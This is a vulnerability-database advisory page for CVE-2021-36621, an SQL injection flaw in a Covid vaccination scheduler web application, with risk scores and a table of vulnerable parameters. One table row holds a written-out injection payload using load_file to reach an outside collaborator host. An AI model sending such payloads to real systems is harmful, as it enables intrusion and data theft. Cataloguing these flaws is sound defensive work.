Lucene search
K

CVE-2021-36621

🗓️ 29 Jul 2021 17:11:30Reported by mitreType 
cve
 cve
🔗 web.nvd.nist.gov📰️ 3 Media mentions👁 85 Views🌐 WEB

Sourcecodester Online Covid Vaccination Scheduler System 1.0 is vulnerable to SQL Injection. The username parameter is vulnerable to time-based SQL injection. Upon successful dumping the admin password hash, an attacker can decrypt and obtain the plain-text password. Hence, the attacker could authenticate as Administrator

Related
Detection
Refs
Paths
Social
ParameterPositionPathDescriptionCWE
usernamerequest bodyscheduler/classes/Login.php?f=loginSQL injection vulnerability in username parameter during login (time-based blind).CWE-89
passwordrequest bodyscheduler/classes/Login.php?f=loginSQL injection vulnerability in username parameter during login (time-based blind).CWE-89
lidquery paramscheduler/addSchedule.php?lid=(select%20load_file('\\\\burpcollaborator.net\\gfd'))SQL injection vulnerability via lid parameter in addSchedule form (remote file read).CWE-89

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Jun 2026 03:58Current
8.4High risk
Vulners AI Score8.4
CVSS 26.8
CVSS 3.18.1
EPSS0.02073
85